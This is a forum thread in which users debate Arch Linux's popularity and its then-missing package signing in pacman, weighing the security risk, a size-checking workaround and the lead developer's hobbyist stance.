Arch Obsession?

[zokudu]

Maybe its just the circles I run around in but outside of ATOT Linux forum everyone I know who has any little knowledge of Linux seems to think Arch Linux is the best distro since sliced bread and every other distro is worthless. Arch is best at everything for them.

Am I missing something? Doesn't Arch have a HUGE security flaw related to unsigned packages? Am I just running into closed minded people?

EDIT: Could have sworn this was in the Linux forums I'll ask to have it moved.

 

[lxskllr]

You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.

 

[Khyron320]

I think one of the big things about Arch is its release model. Unlike fedora/ubuntu which go with major revs and often don't leave upgrade paths or close repos after some time leaving you stranded to get updates easily.

I guess you can get the same thing with Debian Mint.

 

[pcgeek11]

You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.

This...

 

[Schadenfroh]

Hmm, I am not familiar with this distro. I like the idea of a rolling release, having the latest versions of packages and the ability to compile each program using CPU specific optimizations.

I do not like the security concerns, though.

 

[lxskllr]

Hmm, I am not familiar with this distro. I like the idea of a rolling release, having the latest versions of packages and the ability to compile each program using CPU specific optimizations.

I do not like the security concerns, though.

I think it's a lot of work for little to no benefit. Debian testing or unstable works as a good rolling release, but compiling your own distro doesn't get you much, other than the satisfaction of doing it. Outside of some specialized applications, it's only useful as a hobby type activity. You may also learn a bit more on what makes Linux tick, but then again, maybe not. I think a lot of people copy scripts and instructions, without really knowing what they're doing.

 

[darkewaffle]

Foot fetish thread!

 

[irishScott]

You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.

The lack of package signing is still an issue, but recently we've received paccheck from a helpful user. Verifies the size of packages across multiple mirrors before download. Arch's been good about updating their repos, so I doubt a synchronization issue due to updates will be much of a problem. This also may be accounted for in the code (checks timestamps?), just skimmed it.

http://aur.archlinux.org/packages.php?ID=46763

 

[lxskllr]

The lack of package signing is still an issue, but recently we've received paccheck from a helpful user. Verifies the size of packages across multiple mirrors before download. Arch's been good about updating their repos, so I doubt a synchronization issue due to updates will be much of a problem. This also may be accounted for in the code (checks timestamps?), just skimmed it.

http://aur.archlinux.org/packages.php?ID=46763

Interesting. Kind of kludgy, but I'd consider that an acceptable workaround for someone interested in Arch.

 

[Nothinman]

Interesting. Kind of kludgy, but I'd consider that an acceptable workaround for someone interested in Arch.

Yea, that just screams duct tape. And while difficult, it's simpler to make your malicious package have the same size as the original than to match a cryptographically signed package.

 

[sourceninja]

I seriously wouldn't use arch for anything other than a toy for that very reason.

 

[jhu]

I just use Debian and compile CPU intensive programs separately (i.e. Povray).

 

[irishScott]

Yea, that just screams duct tape. And while difficult, it's simpler to make your malicious package have the same size as the original than to match a cryptographically signed package.

It is just duct tape. Actual package signing is in the works, if slowly, largely due to more users bitching about it than contributing code.

A nice blog post by the lead developer of pacman (Arch's package manager) spells out the situation nicely: http://www.toofishes.net/blog/real-story-behind-arch-linux-package-signing/

 

[Nothinman]

It is just duct tape. Actual package signing is in the works, if slowly, largely due to more users bitching about it than contributing code.

A nice blog post by the lead developer of pacman (Arch's package manager) spells out the situation nicely: http://www.toofishes.net/blog/real-story-behind-arch-linux-package-signing/

All that spells out for me is that I now know that I'll never install Arch. The whole post is just him crying about others not doing the work for him when in reality, package signing should be a base function of a package manager in this day and age. Essentially it's been documented as a bug for 5 years now, they've had multiple patches submitted that take care of some, but not all, of the work and yet haven't been able to find time to fill in the gaps. He knew what he was getting into when he volunteered to become the lead developer of pacman, whether he's being paid or not is totally irrelevant.

This quote pretty much spells the whole thing out:

As I said, it really does not affect me. I use the master server for my repo db downloads and know exactly which package updates to expect given I see all commits to our svn repos. So the scope in which I could be attacked is very small and I am prepared to take that risk. So my priorities are clearly different to other peoples. The key difference is, I submit patches to implement what I consider a priority...

They don't give a shit because they follow the development so closely and they don't give a shit about users without that insight.

 

[irishScott]

All that spells out for me is that I now know that I'll never install Arch. The whole post is just him crying about others not doing the work for him when in reality, package signing should be a base function of a package manager in this day and age. Essentially it's been documented as a bug for 5 years now, they've had multiple patches submitted that take care of some, but not all, of the work and yet haven't been able to find time to fill in the gaps. He knew what he was getting into when he volunteered to become the lead developer of pacman, whether he's being paid or not is totally irrelevant.

This quote pretty much spells the whole thing out:



They don't give a shit because they follow the development so closely and they don't give a shit about users without that insight.

And all I ever read in your posts is negativity. Frankly I don't care if you ever use Arch Linux or not. There are hundreds of distros out there, glad you're happy (or found your point of least negativity) with Debian.

In any case, he's doing this as a hobby. He's in it for himself, not the users. If it stops being fun, he loses his motivation. If it takes too much time away from his personal life, he loses his motivation. He doesn't make the distro his life. Likewise this attitude is reflected in the structure of arch. There is no centralized development team per-se, no fixed release cycle, just a bunch of contributors who come and go with a few regulars and individual Trusted Users who take care of individual or groups of packages they choose to promote.

If not being professional about a hobby is a crime, your life must suck.

Arch was never intended to be a professional or corporate distro. It's a framework for individual, geeky users who like to customize the crap out of their systems without the complications of compiling. If you see something you don't like, you're suppose to fix it yourself somehow or other. It's your system. When users of the variety described by lxskllr come along they expect support that was never intended to be there, so they bitch. If half of the users bitching contributed we'd have package signing by now.

And frankly once I learn a little more about it I might very well contribute the appropriate patches myself depending on how much free time I have with classes next semester.

 

[lxskllr]

I can appreciate Arch's approach of fixing things yourself, and the devs frustration of people not submitting code, but my biggest problem, is they seem to want to brush the issue under the table. Public mailing lists are great and everything, but imo, the issue should be listed on the site. Hell, put a warning up in bold font at the top. That, along with an appeal for help might get things going quicker.

The lack of package signing was new to a lot of people. That tells me that it wasn't as common knowledge as they'd lead you to believe. Covering up critical defects isn't cool, and it puts people at risk, without giving them the knowledge to make a choice.

 

[irishScott]

I can appreciate Arch's approach of fixing things yourself, and the devs frustration of people not submitting code, but my biggest problem, is they seem to want to brush the issue under the table. Public mailing lists are great and everything, but imo, the issue should be listed on the site. Hell, put a warning up in bold font at the top. That, along with an appeal for help might get things going quicker.

The lack of package signing was new to a lot of people. That tells me that it wasn't as common knowledge as they'd lead you to believe. Covering up critical defects isn't cool, and it puts people at risk, without giving them the knowledge to make a choice.

I see it more as they simply don't see it as a priority. Read a few threads in the arch forums about it and the general, final opinion seems to be the same logic as to why most mac users have no antivirus. There simply aren't any real threats in the wild. Considering arch linux has a miniscule amount of market share, along with it's individual nature, the logic is someone would have to specifically target an arch user with a hack complex enough to corrupt the specific repository that specific user is using. There currently aren't enough arch users to justify that complex an effort for a mass attackfor say, personal info. Much easier and profitable to just to run a phishing scam among other things.

Meanwhile, given its nature and market share, most corporations or private business users would choose distros known to be secure out of the box, not roll-your-own distros like arch.

If there ever was a corrupted repo of some sort, or if/when arch gets MUCH larger I can see the leadership changing and the distro becoming more professional. Given that arch is currently growing in popularity, that may very well happen. In the meantime arch has gotten along fine with unsigned packages, and the general attitude is if the users want it, the users should code it.

 

[lxskllr]

I dunno. Arch is in the unusual position of being small enough, with an attack vector specific enough, that I could see someone doing it just cause they can. Organized crime may not be interested, but an old school hacker with a bent for mayhem might be game.

 

[irishScott]

I dunno. Arch is in the unusual position of being small enough, with an attack vector specific enough, that I could see someone doing it just cause they can. Organized crime may not be interested, but an old school hacker with a bent for mayhem might be game.

Perhaps, but ignorantGuru seems to be the most fired up about it. I'm surprised he never exploited it just to make a point. Maybe he tried.

But then again there's always the repos own security in the way unless said hacker knows an arch user and can intercept the repo-user link somehow.

In any case, package signing will get to arch eventually. In the meantime everything's running pretty smooth, and pacchecker supplies at least some verification for those that use it.

 

[Nothinman]

In any case, he's doing this as a hobby. He's in it for himself, not the users. If it stops being fun, he loses his motivation. If it takes too much time away from his personal life, he loses his motivation. He doesn't make the distro his life. Likewise this attitude is reflected in the structure of arch. There is no centralized development team per-se, no fixed release cycle, just a bunch of contributors who come and go with a few regulars and individual Trusted Users who take care of individual or groups of packages they choose to promote.

Then they should have a big fat warning that says they don't give a shit about their users and that anyone with any common sense should move on...

If not being professional about a hobby is a crime, your life must suck.

It's not a crime, but if I were developing software that managed other people's data and could have a profound affect on their lives I would care about the security behind my software. These guys obviously don't care.

Arch was never intended to be a professional or corporate distro. It's a framework for individual, geeky users who like to customize the crap out of their systems without the complications of compiling. If you see something you don't like, you're suppose to fix it yourself somehow or other. It's your system. When users of the variety described by lxskllr come along they expect support that was never intended to be there, so they bitch. If half of the users bitching contributed we'd have package signing by now.

And frankly once I learn a little more about it I might very well contribute the appropriate patches myself depending on how much free time I have with classes next semester.

That's all well and good, I'm all for responsibility of the user but this isn't something that each user can be expected to fix or work around themselves. It's a core function of the system that requires intimate knowledge of the system and it's package format. You can't expect users to add their own security hacks on top of it, the fix for this has to be done in the package manager and should've happened year ago.

I see it more as they simply don't see it as a priority. Read a few threads in the arch forums about it and the general, final opinion seems to be the same logic as to why most mac users have no antivirus. There simply aren't any real threats in the wild. Considering arch linux has a miniscule amount of market share, along with it's individual nature, the logic is someone would have to specifically target an arch user with a hack complex enough to corrupt the specific repository that specific user is using. There currently aren't enough arch users to justify that complex an effort for a mass attackfor say, personal info. Much easier and profitable to just to run a phishing scam among other things.

Apple recently became a target of fake A/V malware. As they just learned, it happens before you realize that it should. You can't rely on your small community as a defense, with even minuscule growth rates everything becomes "big enough" eventually and that milestone isn't even your choice. You don't get to say "Ok, with our current growth rates, we'll be a viable target of blackhats in about 17 months...", it just happens one day.

 

[irishScott]

Then they should have a big fat warning that says they don't give a shit about their users and that anyone with any common sense should move on...



It's not a crime, but if I were developing software that managed other people's data and could have a profound affect on their lives I would care about the security behind my software. These guys obviously don't care.



That's all well and good, I'm all for responsibility of the user but this isn't something that each user can be expected to fix or work around themselves. It's a core function of the system that requires intimate knowledge of the system and it's package format. You can't expect users to add their own security hacks on top of it, the fix for this has to be done in the package manager and should've happened year ago.



Apple recently became a target of fake A/V malware. As they just learned, it happens before you realize that it should. You can't rely on your small community as a defense, with even minuscule growth rates everything becomes "big enough" eventually and that milestone isn't even your choice. You don't get to say "Ok, with our current growth rates, we'll be a viable target of blackhats in about 17 months...", it just happens one day.

Mostly true. I'd say the source code is readily available and the developers/forums are pretty friendly. Maybe Dan McGee should be replaced as lead developer for pacman. But he hasn't been, and despite the complaints no one else has come forward to do so. I'm not saying arch is perfect or that it shouldn't change, just that I understand why it is where it is with regard to this issue and have no real problem with it given the circumstances. It's also not a reason to demonize arch by any means.

As for users responsibility, anyone can submit patches for review to the devs. If they're not intimate with arch, then the documentation and human resources are there to get them intimate. Instead most have chosen to bitch about how one dev, who's doing this as a hobby, isn't taking care of them properly. Not that I agree with Dan's attitude, but I understand it.

IMO arch is just growing. It started off as a distribution by a niche of 1337 geeks for a niche of 1337 geeks, in their spare time. Now it's grown to the point where it's attracting non-1337 geeks expecting support that was never in the original formula. Contrast to Ubuntu which was a professional operation from the get-go with user support a primary objective. Arch will most likely change, but given it's origins it makes sense that change will take some time.

As for a warning, hell it's spelled out in Arch's mission statement:
https://wiki.archlinux.org/index.php/The_Arch_Way

User-centric

Whereas many GNU/Linux distributions attempt to be more user-friendly, Arch Linux has always been, and will always remain user-centric.

Arch Linux targets and accommodates competent GNU/Linux users by giving them complete control and responsibility over the system.

Arch Linux users fully manage the system on their own. The system itself will offer little assistance, except for a simple set of maintenance tools that are designed to perfectly relay the user's commands to the system. Arch developers do not expend energy re-inventing GUI system tools; Arch is founded upon sensible design and excellent documentation.

This user-centric design necessarily implies a certain "do-it-yourself" approach to using the Arch distribution. Rather than pursuing assistance or requesting a new feature to be implemented by developers, Arch Linux users have a tendency to solve problems themselves and share the results with the community and development team – a "do first, then ask" philosophy. This is especially true for user-contributed packages found in the Arch User Repository – the official Arch Linux repository for community-maintained packages.

 

[sourceninja]

If the guy managing the packaging system doesn't create the signing system, how do you get all the maintainers on board with actually signing their packages? I'm sure I could hack in signature checking in no time, but getting them to sign their packages seems like a impossible cause if they don't want to do it.

 

[Nothinman]

Mostly true. I'd say the source code is readily available and the developers/forums are pretty friendly. Maybe Dan McGee should be replaced as lead developer for pacman. But he hasn't been, and despite the complaints no one else has come forward to do so. I'm not saying arch is perfect or that it shouldn't change, just that I understand why it is where it is with regard to this issue and have no real problem with it given the circumstances. It's also not a reason to demonize arch by any means.

But it is a reason to demonize them, just as if they told everyone to use telnet because they didn't feel the need to support OpenSSH. Package signing is a basic security feature that people just expect to be there these days.

As for users responsibility, anyone can submit patches for review to the devs. If they're not intimate with arch, then the documentation and human resources are there to get them intimate. Instead most have chosen to bitch about how one dev, who's doing this as a hobby, isn't taking care of them properly. Not that I agree with Dan's attitude, but I understand it.

Not just intimate with Arch, but with the pacman source too which is what would take the most time. And there's the fact that most people can't actually program even if they're comfortable using Linux.

IMO arch is just growing. It started off as a distribution by a niche of 1337 geeks for a niche of 1337 geeks, in their spare time. Now it's grown to the point where it's attracting non-1337 geeks expecting support that was never in the original formula. Contrast to Ubuntu which was a professional operation from the get-go with user support a primary objective. Arch will most likely change, but given it's origins it makes sense that change will take some time.

But Ubuntu started as a fork of Debian, which was and still NFP but still actually cares about their users even though most of the devs aren't involved with any of the official support options.

As for a warning, hell it's spelled out in Arch's mission statement:
https://wiki.archlinux.org/index.php/The_Arch_Way

I don't see in there where it says that the base system is built with fairly large security holes and that no one should use the system unless they're prepared to deal with them.

 

[irishScott]

If the guy managing the packaging system doesn't create the signing system, how do you get all the maintainers on board with actually signing their packages? I'm sure I could hack in signature checking in no time, but getting them to sign their packages seems like a impossible cause if they don't want to do it.

From what I can gather most of the big names (including those that oversee the package databases) are on board with the idea. It should be Dan McGee's job to implement though, most of the others are taking care of their own duties.

At the very least, you can make a big announcement about package signing and then have pacman bitch for verification if its told to download an unsigned package. Everyone will go "ZOMG I'm being hacked!" and the maintainer of said package will be lynched until he starts signing.

 

[irishScott]

But it is a reason to demonize them, just as if they told everyone to use telnet because they didn't feel the need to support OpenSSH. Package signing is a basic security feature that people just expect to be there these days.



Not just intimate with Arch, but with the pacman source too which is what would take the most time. And there's the fact that most people can't actually program even if they're comfortable using Linux.



But Ubuntu started as a fork of Debian, which was and still NFP but still actually cares about their users even though most of the devs aren't involved with any of the official support options.



I don't see in there where it says that the base system is built with fairly large security holes and that no one should use the system unless they're prepared to deal with them.

Say a bunch of software engineers develop a distribution for themselves, and only for themselves, as a hobby. Then they publish it on the internet in the hope of attracting other software engineers to improve it. The distro is good in many ways and attracts non-software engineers, which was never its intention. Do you really expect the original team to accommodate them when that was never their intention? It's like expecting someone driving a mostly empty bus to pick up, feed, and transport every hitch hiker they see to each individual destination just because they have the room.

The pacman source code is available as as well. And I think the original attitude was that this was a distro for coders. Hence the user-centric bit. Not that this should or shouldn't change, but that's where it's coming from.

The issue isn't arch's devs as a whole, most are doing their jobs just fine. Dan's being a little selfish, but given this is his hobby I can understand that. Like I said a lot of people have had the stones to bitch, but none to replace him. He's all we've got for the time being. As for the community, despite what "The Arch Way" says it is very helpful. The forums are dedicated to arch with no off-topic sections, making most responses informative at the least. Hell the verification question is entering an obscure, ass-backwards, terminal command and supplying the 40-60 character string it produces. There have been threads of noobs on other forums just trying to figure IT out. Not difficult in reality, even for a noob, but shows the kind of person they want to attract.

And no where is Arch really advertising itself. It doesn't even mention security on its front page, or its mission statement. It was built as a hobbyist distro. I'm not saying that excuses security holes, but it explains why they're there. My attitude, in traditional arch form is "alright, I've been itching for a meaningful project for a while anyway. Why not this?" So as a coder I'll get intimate with pacman/other related packages and see what I can do. At the very least I should be able to make some helpful suggestions to speed things along.

And just to clarify, aside from the package signing issue, arch is as secure as you make it. You mention holes plural, but I've never heard of any others.